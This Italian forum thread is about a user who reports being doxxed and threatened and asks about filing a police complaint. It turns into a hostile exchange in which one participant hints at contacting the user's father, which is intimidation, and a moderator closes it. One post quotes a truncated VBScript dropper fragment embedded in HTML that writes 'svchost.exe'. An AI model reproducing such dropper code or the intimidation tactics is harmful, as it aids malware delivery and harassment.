Domanda Denuncia per Dox

Stato
Discussione chiusa ad ulteriori risposte.

#Federico100

Utente Assiduo
Autore del topic
5 Luglio 2011
527
21
Miglior risposta
0
A quanto pare sono stato doxato da una persona che m'ha minacciato e che voleva roba in cambio.
Essendo lui il proprietario del Forum dove è presente il Dox, ma non solo, anche molto materiale Warez,
se sporgessi denuncia, in quanto tempo il Forum verrebbe chiuso e il proprietario punito? Grazie.

P.S.: Dox = Pubblicazione di tutti i dati sensibili.
 
Ultima modifica:
Inteligenza da bambino. Cosa non capisci che poker non è denunciabile? Idem io, in quanto le foto sono reperibili senza aggiungere negli amici sul profilo di tuo padre.
Denunciami, sto ancora aspettando.
Parla lui che: Aveva VBulletin Crackato, Il forum che parlava di come essere hacker a 2 anni, e dopo la chiusura mettendo script
<td align="center"><font color="white"><font color="white"><font color="white"><font color="white"><font color="white"><a href="http://xenicrew.eu"><font color="#ffffff"><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =

- - - Aggiornato - - -
@TBH Potresti chiudere? Ho già parlatto con il padre, direi che non ritornerà tra poco tempo :emoji_relieved:
 
Inteligenza da bambino. Cosa non capisci che poker non è denunciabile? Idem io, in quanto le foto sono reperibili senza aggiungere negli amici sul profilo di tuo padre.
Denunciami, sto ancora aspettando.
Parla lui che: Aveva VBulletin Crackato, Il forum che parlava di come essere hacker a 2 anni, e dopo la chiusura mettendo script


- - - Aggiornato - - -
@TBH Potresti chiudere? Ho già parlatto con il padre, direi che non ritornerà tra poco tempo :emoji_relieved:

Bene, allora non hai capito un cazzo amaro, il mio numero di cellulare? la via dove vivo? Quanto sei rincoglionito.
Inoltre ho tenuto un topic senza fare nomi, e vieni te paladino della legge a sparare cazzate.
Ma vai a cagare, va.

[OT]TBH, dai, warnalo pure, dato che istiga al flame e va in OT[/OT]
 
ma che diavolo succede ?, vi ricordo che vi trovate già in off topic ... come categoria. @#Federico100 modera il linguaggio, avverto.
 
ma che diavolo succede ?, vi ricordo che vi trovate già in off topic ... come categoria. @#Federico100 modera il linguaggio, avverto.

Eh bravo, bravo arrivi te che sei suo amico, e mi avverti a me se lui inizia a provocarmi? (Come sempre, d'altronde non ha mai niente da fare)

- - - Aggiornato - - -

Vah, renditi utile e chiudi la discussione, tanto colui che ha postato il dox l'ha tolto. @TBH
 
Mi limito a chiudere che è meglio .
Per l'ultimo messaggio che hai scritto dovrei come minimo darti un infrazione ,mah :|
 
Ultima modifica:
Stato
Discussione chiusa ad ulteriori risposte.